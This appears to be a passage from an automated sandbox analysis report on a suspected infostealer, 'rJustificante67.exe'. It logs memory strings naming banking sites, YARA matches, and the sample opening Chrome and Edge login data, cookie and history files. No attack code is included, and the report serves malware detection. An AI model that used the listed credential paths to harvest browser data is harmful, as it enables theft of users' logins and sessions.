Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: rJustificante67.exe, 00000003.00000002.3928016802.000000003415C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: rJustificante67.exe, 00000003.00000002.3928016802.00000000341B7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\rJustificante67.exe	API call chain: ExitProcess graph end node			graph_0-4472
Source: C:\Users\user\Desktop\rJustificante67.exe	API call chain: ExitProcess graph end node			graph_0-4471

Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Users\user\Desktop\rJustificante67.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000003.00000002.3926681535.0000000032F4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rJustificante67.exe PID: 6776, type: MEMORYSTR

Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior